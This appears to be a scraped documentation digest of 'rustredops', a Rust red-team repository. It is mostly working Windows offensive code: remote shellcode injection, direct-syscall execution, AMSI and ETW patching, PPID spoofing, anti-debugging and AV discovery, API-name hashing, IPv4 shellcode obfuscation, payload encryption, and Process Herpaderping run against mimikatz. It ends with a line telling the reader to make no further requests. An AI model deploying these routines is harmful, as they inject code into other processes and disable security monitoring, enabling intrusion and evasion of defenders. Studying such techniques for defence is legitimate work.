### Build and Execute UEFI Application Source: https://github.com/joaoviictorti/rustredops/blob/main/Create-UEFI/README.md Commands to compile a Rust project for the UEFI target, install necessary virtualization tools, prepare the file system structure, and launch the application in QEMU. ```bash cargo build --target x86_64-unknown-uefi winget show qemu mkdir -p esp/efi/boot mv bootx64.efi esp/efi/boot qemu-system-x86_64 -drive if=pflash,format=raw,readonly=on,file=OVMF_CODE.fd -drive if=pflash,format=raw,readonly=on,file=OVMF_VARS.fd -drive format=raw,file=fat:rw:esp ``` -------------------------------- ### Display Help Information (Shell) Source: https://github.com/joaoviictorti/rustredops/blob/main/Obfuscation/README.md Displays the help message for the shellcode obfuscation tool, outlining available commands, options, and usage examples. This is useful for understanding the tool's capabilities and how to interact with it. ```sh cargo run --release -- --help ``` -------------------------------- ### Enumerate System Information via WMI Source: https://context7.com/joaoviictorti/rustredops/llms.txt Uses the wmi crate to query Windows Management Instrumentation. This example specifically targets the SecurityCenter2 namespace to identify installed antivirus products. ```rust use std::collections::HashMap; use wmi::{COMLibrary, Variant, WMIConnection}; fn main() -> Result<(), wmi::WMIError> { let _com = COMLibrary::new()?; let wmi = unsafe { WMIConnection::with_initialized_com(Some("root\\SecurityCenter2"))? }; let results = wmi.raw_query::>("SELECT * FROM AntiVirusProduct")?; for av in results { println!("Antivirus Product:"); for (key, value) in &av { println!(" {}: {:?}", key, value); } } Ok(()) } ``` -------------------------------- ### Execute SSN Syscall Search with Debug Logging Source: https://github.com/joaoviictorti/rustredops/blob/main/Hells-Halos-Tartarus-Gate/README.md This command enables debug logging for Rust and executes the test suite, which likely includes the SSN syscall search functionality. It requires the Rust toolchain and Cargo to be installed. ```shell $env:RUST_LOG="debug" cargo test ``` -------------------------------- ### Rust API Hooking with Inline Hooks for MessageBoxA Source: https://context7.com/joaoviictorti/rustredops/llms.txt Intercepts Windows API calls, specifically MessageBoxA, by overwriting the beginning of the function with a jump to custom Rust code. It utilizes the `windows` crate for Windows API access and demonstrates saving original bytes and installing a trampoline. Dependencies include the `windows` crate. ```rust use std::ffi::{c_void, CStr}; use std::slice::{from_raw_parts, from_raw_parts_mut}; use windows::Win32::{ Foundation::HWND, System::LibraryLoader::{GetProcAddress, LoadLibraryA}, System::Memory::{VirtualProtect, PAGE_EXECUTE_READWRITE, PAGE_PROTECTION_FLAGS}, UI::WindowsAndMessaging::{MessageBoxA, MessageBoxW, MESSAGEBOX_STYLE, MESSAGEBOX_RESULT, MB_OK}, }; use windows::core::{s, w}; extern "system" fn my_message_box_a( hwnd: HWND, lp_text: *const i8, lp_caption: *const i8, u_type: MESSAGEBOX_STYLE, ) -> MESSAGEBOX_RESULT { let text = unsafe { CStr::from_ptr(lp_text).to_string_lossy() }; println!("[+] Intercepted MessageBoxA: {}", text); unsafe { MessageBoxW(hwnd, w!("HOOKED!"), w!("Hook Active"), u_type) } } struct Hook { bytes_original: [u8; 13], function_run: *mut c_void, function_hook: *mut c_void, } impl Hook { fn new(function_run: *mut c_void, function_hook: *mut c_void) -> Self { Self { bytes_original: [0; 13], function_run, function_hook } } fn install(&mut self) { // x64 trampoline: mov r10, addr; jmp r10 let mut trampoline: [u8; 13] = [ 0x49, 0xBA, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x41, 0xFF, 0xE2, ]; unsafe { let mut old_protect = PAGE_PROTECTION_FLAGS(0); VirtualProtect(self.function_hook, 13, PAGE_EXECUTE_READWRITE, &mut old_protect).unwrap(); // Save original bytes self.bytes_original.copy_from_slice(from_raw_parts(self.function_hook as *const u8, 13)); // Write function address into trampoline let addr_bytes = (self.function_run as usize).to_ne_bytes(); trampoline[2..10].copy_from_slice(&addr_bytes); // Install trampoline from_raw_parts_mut(self.function_hook as *mut u8, 13).copy_from_slice(&trampoline); } } } fn main() { let hmodule = unsafe { LoadLibraryA(s!("user32.dll")).unwrap() }; let func = unsafe { GetProcAddress(hmodule, s!("MessageBoxA")).unwrap() }; let mut hook = Hook::new(my_message_box_a as *mut c_void, func as *mut c_void); hook.install(); // This call will be intercepted unsafe { MessageBoxA(HWND(0), s!("Original Message"), s!("Test"), MB_OK); } } // Usage: cargo run --release ``` -------------------------------- ### Build and Execute WebAssembly Shellcode Source: https://github.com/joaoviictorti/rustredops/blob/main/WebAssembly-Shellcode/README.md Commands to compile Rust code into a WebAssembly module, convert the binary to a WAT file, and execute the shellcode using the provided Rust runner. ```sh wasm-pack build --target bundler ``` ```sh wasm2wat pkg/shellcode_webassembly_bg.wasm -o shell.wat ``` ```sh cargo run --release ``` ```sh target/release/execute_shellcode.exe ``` -------------------------------- ### Perform PPID Spoofing in Rust Source: https://context7.com/joaoviictorti/rustredops/llms.txt This snippet demonstrates how to create a new process while spoofing its parent process ID using the Windows API. It utilizes the EXTENDED_STARTUPINFO_PRESENT flag and attribute lists to deceive process tree monitoring tools. ```rust use std::{ffi::c_void, mem::size_of, ptr::null_mut}; use windows::core::{Result, PSTR}; use windows::Win32::{ Foundation::HANDLE, System::{ Memory::{GetProcessHeap, HeapAlloc, HEAP_ZERO_MEMORY}, Threading::{ CreateProcessA, DeleteProcThreadAttributeList, InitializeProcThreadAttributeList, OpenProcess, UpdateProcThreadAttribute, EXTENDED_STARTUPINFO_PRESENT, LPPROC_THREAD_ATTRIBUTE_LIST, PROCESS_ALL_ACCESS, PROCESS_INFORMATION, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, STARTUPINFOEXA, }, }, }; fn main() -> Result<()> { let parent_pid = 35372; let mut si = STARTUPINFOEXA::default(); let mut pi = PROCESS_INFORMATION::default(); si.StartupInfo.cb = size_of::() as u32; unsafe { let h_parent = OpenProcess(PROCESS_ALL_ACCESS, false, parent_pid)?; let mut attr_size = 0; let _ = InitializeProcThreadAttributeList(LPPROC_THREAD_ATTRIBUTE_LIST(null_mut()), 1, 0, &mut attr_size); let attr_list = LPPROC_THREAD_ATTRIBUTE_LIST(HeapAlloc(GetProcessHeap()?, HEAP_ZERO_MEMORY, attr_size)); InitializeProcThreadAttributeList(attr_list, 1, 0, &mut attr_size)?; UpdateProcThreadAttribute( attr_list, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS as usize, Some(&h_parent as *const _ as *const c_void), size_of::(), None, None, )?; let cmd = std::env::var("WINDIR").unwrap() + "\\System32\\notepad.exe"; si.lpAttributeList = attr_list; CreateProcessA(None, PSTR(cmd.as_ptr().cast_mut()), None, None, false, EXTENDED_STARTUPINFO_PRESENT, None, None, &si.StartupInfo, &mut pi)?; DeleteProcThreadAttributeList(attr_list); } Ok(()) ``` -------------------------------- ### Enumerate Processes with sysinfo Crate (Rust) Source: https://context7.com/joaoviictorti/rustredops/llms.txt This snippet demonstrates how to enumerate all running processes on a Windows system using the `sysinfo` crate. It iterates through processes, printing their names and PIDs, which is useful for reconnaissance. ```rust use sysinfo::System; fn main() { let mut system = System::new_all(); system.refresh_all(); for (pid, process) in system.processes() { println!("Process: {:?} | PID: {}", process.name(), pid); } } // Output: // Process: "explorer.exe" | PID: 1234 // Process: "notepad.exe" | PID: 5678 // ... ``` -------------------------------- ### Execute Windows Syscalls Directly in Rust Source: https://context7.com/joaoviictorti/rustredops/llms.txt Demonstrates how to invoke Windows system calls directly to bypass user-mode API hooks. It uses the Hells/Halos/Tartarus Gate approach to perform memory allocation, shellcode writing, and thread creation. ```Rust use syscall::syscall; use core::{ptr::null_mut, ffi::c_void}; #[inline] pub fn NT_SUCCESS(status: i32) -> bool { status >= 0 } fn main() { let shellcode: [u8; 276] = [ /* shellcode bytes */ ]; let mut size = shellcode.len(); let mut address = null_mut::(); unsafe { let status = syscall!( "NtAllocateVirtualMemory", u64::MAX, &mut address, 0, &mut size, 0x3000, 0x40 ); if !NT_SUCCESS(status) { return; } syscall!( "NtWriteVirtualMemory", u64::MAX, address, shellcode.as_ptr() as *mut c_void, shellcode.len(), null_mut::() ); let mut h_thread = null_mut::(); syscall!( "NtCreateThreadEx", &mut h_thread, 0x1FFFFF, null_mut::(), u64::MAX, address, null_mut::(), 0_usize, 0_usize, 0_usize, 0_usize, null_mut::() ); } } ``` -------------------------------- ### Process Injection (Shellcode) using Windows API (Rust) Source: https://context7.com/joaoviictorti/rustredops/llms.txt This code snippet illustrates a classic process injection technique using Rust and the Windows API. It allocates memory in a target process, writes shellcode to it, and then creates a remote thread to execute the shellcode. It requires the `windows` and `sysinfo` crates. ```rust use std::mem::transmute; use sysinfo::{PidExt, ProcessExt, System, SystemExt}; use windows::core::Result; use windows::Win32:: Foundation::{CloseHandle, HANDLE}, System:: Diagnostics::Debug::WriteProcessMemory, Memory::{VirtualAllocEx, MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE_READ}, Threading::{CreateRemoteThread, OpenProcess, WaitForSingleObject, INFINITE, PROCESS_ALL_ACCESS}, }; fn find_process(name: &str) -> Result { let mut system = System::new_all(); system.refresh_all(); let processes = system.processes().values() .filter(|p| p.name().to_lowercase() == name) .collect::>(); if let Some(process) = processes.into_iter().next() { println!("[+] Process with PID found: {}", process.pid()); let hprocess = unsafe { OpenProcess(PROCESS_ALL_ACCESS, false, process.pid().as_u32())? }; return Ok(hprocess); } Err(windows::core::Error::from_win32()) } fn main() -> Result<()> { // Example shellcode (calc.exe) let shellcode: [u8; 276] = [ /* shellcode bytes */ ]; unsafe { let h_process = find_process("notepad.exe")?; let address = VirtualAllocEx(h_process, None, shellcode.len(), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READ); WriteProcessMemory(h_process, address, shellcode.as_ptr().cast(), shellcode.len(), None)?; let h_thread = CreateRemoteThread(h_process, None, 0, Some(transmute(address)), None, 0, None)?; WaitForSingleObject(h_thread, INFINITE); CloseHandle(h_process)?; CloseHandle(h_thread)?; } Ok(()) } // Usage: cargo run --release ``` -------------------------------- ### Implement String Hashing Algorithms in Rust Source: https://context7.com/joaoviictorti/rustredops/llms.txt Provides implementations of DJB2, Jenkins one-at-a-time, and ROTR32 hashing algorithms. These are commonly used to obfuscate API names to evade static analysis detection. ```rust fn djb2(string: &str) -> u32 { let mut hash: u32 = 5381; for c in string.bytes() { hash = ((hash << 5).wrapping_add(hash)).wrapping_add(c as u32); } hash } fn jenkins_one_at_a_time(string: &str) -> u32 { let mut hash = 0u32; for c in string.bytes() { hash = hash.wrapping_add(c as u32); hash = hash.wrapping_add(hash << 10); hash ^= hash >> 6; } hash = hash.wrapping_add(hash << 3); hash ^= hash >> 11; hash = hash.wrapping_add(hash << 15); hash } fn rotr32(string: &str) -> u32 { let mut value = 0u32; for &c in string.as_bytes() { let rotated = (value >> 7) | (value << (32 - 7)); value = (c as u32).wrapping_add(rotated); } value } ``` -------------------------------- ### Execute Process Herpaderping (Rust) Source: https://github.com/joaoviictorti/rustredops/blob/main/Process-Herpaderping/README.md Executes the Process Herpaderping technique using Rust. It requires the path to an executable file, its arguments, and a target path for modification. This is useful for security research and understanding process manipulation. ```rust fn main() { // Example usage: // cargo run --release -- // cargo run --release -- mimikatz.exe "coffee localtime" C:\\Windows\\System32\\OneDriveSetup.exe } ``` -------------------------------- ### Execute Commands via COM Shell.Application Source: https://context7.com/joaoviictorti/rustredops/llms.txt Utilizes the Windows COM interface to invoke Shell.Application. This technique can be used to execute binaries while potentially bypassing application whitelisting controls. ```rust use windows_core::{BSTR, GUID, VARIANT}; use windows::Win32::{ System::Com::{CoCreateInstance, CoInitializeEx, CLSCTX_ALL, COINIT_MULTITHREADED}, UI::Shell::IShellDispatch2, }; const CLSID_SHELL: GUID = GUID::from_u128(0x13709620_C279_11CE_A49E_444553540000); fn main() -> windows::core::Result<()> { unsafe { CoInitializeEx(None, COINIT_MULTITHREADED).ok()?; let shell: IShellDispatch2 = CoCreateInstance(&CLSID_SHELL, None, CLSCTX_ALL)?; shell.ShellExecute( &BSTR::from("calc.exe"), &VARIANT::default(), &VARIANT::default(), &VARIANT::default(), &VARIANT::from(1), )?; } Ok(()) } ``` -------------------------------- ### Rust Anti-Debugging Techniques using API, PEB, Process, and Hardware Breakpoints Source: https://context7.com/joaoviictorti/rustredops/llms.txt Implements multiple methods to detect debuggers on Windows, including checking `IsDebuggerPresent` API, inspecting the PEB for the `BeingDebugged` flag, enumerating running processes for known debugger executables, and checking hardware debug registers. Dependencies include `sysinfo` and `windows` crates. ```rust use sysinfo::System; use windows::Win32::System::{ Threading::{GetCurrentThread, PEB}, Diagnostics::Debug::{GetThreadContext, IsDebuggerPresent, CONTEXT, CONTEXT_DEBUG_REGISTERS_AMD64}, }; fn is_debugger_present() -> bool { unsafe { IsDebuggerPresent().into() } } fn is_debugger_peb() -> bool { unsafe { let peb = NtCurrentPeb(); (*peb).BeingDebugged == 1 } } fn check_debugger_processes() -> bool { let debuggers = vec!["x64dbg.exe", "ida.exe", "ida64.exe", "msvsmon.exe"]; let mut system = System::new_all(); system.refresh_all(); for (_, process) in system.processes() { if debuggers.contains(&process.name()) { return true; } } false } fn check_hardware_breakpoints() -> bool { let mut ctx = CONTEXT { ContextFlags: CONTEXT_DEBUG_REGISTERS_AMD64, ..Default::default() }; unsafe { GetThreadContext(GetCurrentThread(), &mut ctx).ok(); } ctx.Dr0 != 0 || ctx.Dr1 != 0 || ctx.Dr2 != 0 || ctx.Dr3 != 0 } #[inline(always)] pub fn NtCurrentPeb() -> *const PEB { unsafe { let out: u64; core::arch::asm!("mov {}, gs:[0x60]", lateout(reg) out, options(nostack, pure, readonly)); out as *const PEB } } fn main() { if is_debugger_present() { println!("[!] Debugger detected via IsDebuggerPresent"); } if is_debugger_peb() { println!("[!] Debugger detected via PEB"); } if check_debugger_processes() { println!("[!] Debugger process detected"); } if check_hardware_breakpoints() { println!("[!] Hardware breakpoint detected"); } } // Usage: cargo run --release ``` -------------------------------- ### Encrypt and Decrypt Payloads with AES-256-CBC Source: https://context7.com/joaoviictorti/rustredops/llms.txt Demonstrates payload obfuscation using the libaes crate. It provides functions to encrypt and decrypt byte buffers using a static key and initialization vector. ```rust use libaes::Cipher; const KEY: &[u8; 32] = b"SUPER_SECRET_PASSWORD_IMPOSSIBLE"; const IV: &[u8; 16] = b"This is 16 bytes"; fn encrypt_aes(buf: &[u8]) -> Vec { let cipher = Cipher::new_256(KEY); cipher.cbc_encrypt(IV, buf) } fn decrypt_aes(buf: &[u8]) -> Vec { let cipher = Cipher::new_256(KEY); cipher.cbc_decrypt(IV, buf) } ``` -------------------------------- ### Parse PE Headers in Rust Source: https://context7.com/joaoviictorti/rustredops/llms.txt This snippet parses the Portable Executable (PE) header of a Windows binary to extract critical information such as section names, entry points, and image base addresses. It requires a file path as input and performs raw memory mapping to traverse the headers. ```rust use windows::Win32::System::Diagnostics::Debug::*; use windows::Win32::System::SystemServices::{IMAGE_DOS_HEADER, IMAGE_DOS_SIGNATURE, IMAGE_NT_SIGNATURE}; fn main() -> Result<(), Box> { let args: Vec = std::env::args().collect(); let buffer = std::fs::read(&args[1])?; unsafe { let dos_header = buffer.as_ptr() as *mut IMAGE_DOS_HEADER; if (*dos_header).e_magic != IMAGE_DOS_SIGNATURE { panic!("[!] Invalid DOS signature"); } let nt_header = (dos_header as usize + (*dos_header).e_lfanew as usize) as *mut IMAGE_NT_HEADERS64; if (*nt_header).Signature != IMAGE_NT_SIGNATURE { panic!("[!] Invalid NT signature"); } let file_header = (*nt_header).FileHeader; println!("[+] Number of sections: {}", file_header.NumberOfSections); let optional_header = (*nt_header).OptionalHeader; println!("[+] Entry point: 0x{:08X}", optional_header.AddressOfEntryPoint); println!("[+] Image base: 0x{:016X}", optional_header.ImageBase); let mut section = (nt_header as usize + size_of::()) as *mut IMAGE_SECTION_HEADER; for _ in 0..file_header.NumberOfSections { println!("[#] Section: {}", std::str::from_utf8(&(*section).Name)?); println!(" Size: {} | RVA: 0x{:08X}", (*section).SizeOfRawData, (*section).VirtualAddress); section = section.add(1); } } Ok(()) ``` -------------------------------- ### Add Compile-Time Encryption Dependency to Cargo.toml Source: https://github.com/joaoviictorti/rustredops/blob/main/Compile-Encrypt-String/README.md This snippet shows how to add the compile-time encryption library as a local dependency in your Cargo.toml file. It assumes the library is located in a relative path. ```toml obf = { path = "../obf" } ``` -------------------------------- ### Use Compile-Time Encrypted String in Rust Source: https://github.com/joaoviictorti/rustredops/blob/main/Compile-Encrypt-String/README.md This Rust code demonstrates how to use the compile-time encrypted string macro. It imports the `obf` macro, encrypts a string literal at compile time, and then prints the decrypted string at runtime. ```rust use obf::obf; fn main() { let nome = obf!("I'm encrypted!"); println!("{}", nome); } ``` -------------------------------- ### Obfuscate Shellcode to IPv4 Addresses (Rust) Source: https://github.com/joaoviictorti/rustredops/blob/main/Obfuscation/README.md Encodes raw shellcode into a vector of IPv4 addresses. This function takes a binary file as input and outputs obfuscated shellcode in a human-readable IPv4 format, useful for evading simple signature-based detection. ```sh cargo run --release -- -f shell.bin -t ipv4 -a obfuscate ``` ```rust let shellcode = vec![ "252.72.131.228", "240.232.192.0", "0.0.65.81", // ... ]; ``` -------------------------------- ### Disable ETW via Function Hooking in Rust Source: https://context7.com/joaoviictorti/rustredops/llms.txt Disables Event Tracing for Windows (ETW) by overwriting the EtwEventWrite function with a return-zero instruction sequence. This prevents the logging of sensitive process activities. ```Rust use windows::core::{s, Result, PCSTR}; use windows::Win32::System::LibraryLoader::{GetModuleHandleA, GetProcAddress}; use windows::Win32::System::Memory::{VirtualProtect, PAGE_EXECUTE_READWRITE, PAGE_PROTECTION_FLAGS}; fn main() -> Result<()> { let name = c"EtwEventWrite"; unsafe { let hook = [0x33, 0xC0, 0xC3]; let h_module = GetModuleHandleA(s!("ntdll.dll"))?; let address = GetProcAddress(h_module, PCSTR(name.as_ptr().cast())) .ok_or_else(|| windows::core::Error::from_win32())? as *const u8; let mut old_protection = PAGE_PROTECTION_FLAGS(0); VirtualProtect(address.cast(), hook.len(), PAGE_EXECUTE_READWRITE, &mut old_protection)?; std::ptr::copy_nonoverlapping(hook.as_ptr(), address.cast_mut(), hook.len()); VirtualProtect(address.cast(), hook.len(), old_protection, &mut old_protection)?; } Ok(()) } ``` -------------------------------- ### Deobfuscate IPv4 Addresses to Raw Shellcode (Rust) Source: https://github.com/joaoviictorti/rustredops/blob/main/Obfuscation/README.md Decodes shellcode previously obfuscated into IPv4 addresses back into its original raw binary format. This process is essential for executing the shellcode after it has been transmitted or stored in an obfuscated form. ```sh cargo run --release -- -f file.txt -t ipv4 -a deobfuscate ``` ```rust let shellcode = vec![ 0xFC, 0x48, 0x83, 0xE4, 0xF0, 0xE8, 0xC0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, // ... ]; ``` -------------------------------- ### Bypass AMSI via Memory Patching in Rust Source: https://context7.com/joaoviictorti/rustredops/llms.txt Patches the AmsiScanBuffer function in memory by modifying conditional jump instructions. This effectively disables the Antimalware Scan Interface by forcing a bypass of the scanning logic. ```Rust use std::ffi::c_void; use std::slice::from_raw_parts; use windows::core::{s, Result, PCSTR}; use windows::Win32::System::LibraryLoader::{GetProcAddress, LoadLibraryA}; use windows::Win32::System::Memory::{VirtualProtect, PAGE_EXECUTE_READWRITE, PAGE_PROTECTION_FLAGS}; fn main() -> Result<()> { let name = c"AmsiScanBuffer"; unsafe { let patch_opcode = 0x75u8; let h_module = LoadLibraryA(s!("AMSI"))?; let address = GetProcAddress(h_module, PCSTR(name.as_ptr().cast())) .ok_or_else(|| windows::core::Error::from_win32())? as *const u8; let pattern = [0xC3, 0xCC, 0xCC]; let bytes = from_raw_parts(address, 0x1000); let mut p_patch_address = std::ptr::null_mut(); if let Some(x) = bytes.windows(pattern.len()).position(|w| w == pattern) { for i in (0..x).rev() { if bytes[i] == 0x74 { p_patch_address = address.add(i) as *mut c_void; break; } } } let mut old_protect = PAGE_PROTECTION_FLAGS(0); VirtualProtect(p_patch_address, 1, PAGE_EXECUTE_READWRITE, &mut old_protect)?; *(p_patch_address as *mut u8) = patch_opcode; VirtualProtect(p_patch_address, 1, old_protect, &mut old_protect)?; } Ok(()) } ``` === COMPLETE CONTENT === This response contains all available snippets from this library. No additional content exists. Do not make further requests.